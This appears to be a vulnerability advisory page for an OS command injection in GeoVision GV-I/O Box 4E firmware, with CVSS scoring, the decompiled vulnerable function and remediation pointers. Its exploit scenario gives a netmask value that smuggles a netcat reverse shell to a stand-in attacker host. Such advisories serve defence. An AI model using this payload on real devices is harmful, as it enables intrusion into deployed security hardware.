Skip to main content

GeoVision GV-I/O Box 4E CVE-2026-12849

| EUVDEUVD-2026-38651 CRITICAL
OS Command Injection (CWE-78)
2026-06-24 GV GHSA-vrqf-28p4-6h8f
9.1
CVSS 3.1 · Vendor: GV
Share

Severity by source

Vendor (GV) PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
9.1 CRITICAL

Network-reachable config RPC, trivial injection (AC:L), but PR:H because invoking the netmask setter requires admin authority; full C/I/A on the device with Scope change to attached units.

3.1 AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (GV).

CVSS VectorVendor: GV

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

1
Analysis Generated
Jun 24, 2026 - 05:32 vuln.today

DescriptionCVE.org

Multiple OS command injection vulnerabilities exist in the libNetSetObj.so functionality of GeoVision GV-I/O Box 4E 2.09. A specially crafted network packet can lead to command execution. An attacker can send a network request to trigger this vulnerability.

libNetSetObj.so is an internal library used by various binaries on the device to configure the network stack (start and stop various services, configure IP, Netmask, gateway, dns, etc.)

CNetSetObj::m_F_n_Set_Net_Mask command injection

The following function takes a string as a net mask address, performs no sanitization on it and calls system. This is a classic command injection vulnerability. The function is reachable from both the network-exposed DVRSearch service and the Network.cgi endpoint.

int __fastcall CNetSetObj::m_F_n_Set_Net_Mask(const char **this, char *netmask_addr)

{

bool v2; // zf

char v4[72]; // [sp+0h] [bp-48h] BYREF

v2 = *this == 0;

if ( *this )

v2 = netmask_addr == 0;

if ( v2 )

return 0;

sprintf(v4, "/sbin/ifconfig %s netmask %s", *this, netmask_addr); // attacker controlled netmask_addr

system(v4);

return 1;

}

AnalysisAI

OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows attackers who can reach the device's network services to execute arbitrary shell commands via unsanitised netmask input passed to system() inside libNetSetObj.so. The flawed CNetSetObj::m_F_n_Set_Net_Mask routine is reachable through both the network-exposed DVRSearch service and the Network.cgi endpoint, yielding code execution in the context of the configuration daemon. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify exposed GV-I/O Box 4E
Delivery
Authenticate to DVRSearch or Network.cgi
Exploit
Submit netmask field with shell metacharacters
Execution
Trigger sprintf into system() in libNetSetObj.so
Persist
Execute commands as config service
Impact
Pivot to attached DVR/NVR devices

Vulnerability AssessmentAI

Exploitation Attacker must reach the GV-I/O Box 4E over the network on either the DVRSearch service port or the HTTP interface serving Network.cgi, and per CVSS PR:H must possess high-privileged (administrative) credentials accepted by those interfaces in order to invoke the netmask-setter code path in libNetSetObj.so. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS:3.1 vector AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H yields 9.1 Critical, but the PR:H metric is the decisive signal: exploitation requires the caller to already have administrative authority to invoke the network-configuration RPC or CGI, which contradicts the description's suggestion that 'a network request' alone is sufficient - verify with the vendor whether DVRSearch authentication is enforced by default, because if it is not, real-world risk is closer to PR:N and the score should be 9.8/10.0. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has obtained or guessed administrative credentials for the GV-I/O Box 4E sends a crafted Network.cgi request (or DVRSearch protocol message) setting the netmask field to a value such as '255.255.255.0; nc -e /bin/sh attacker.example 4444 #', causing libNetSetObj.so to pass the string through sprintf into system() and spawn a reverse shell running with the configuration service's privileges. No public exploit is identified at time of analysis, but the Talos report's disassembly of CNetSetObj::m_F_n_Set_Net_Mask makes a working PoC straightforward to produce. …
Remediation No vendor-released patch identified at time of analysis; monitor the GeoVision cybersecurity page at https://www.geovision.com.tw/cyber_security.php and the Talos advisory at https://talosintelligence.com/vulnerability_reports/TALOS-2026-2379 for a firmware update superseding 2.09 and apply it on availability. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: (1) Identify and inventory all GeoVision GV-I/O Box 4E devices on the network, documenting current firmware versions; (2) Apply network-level access restrictions via firewall rules to limit exposure. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-12849 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy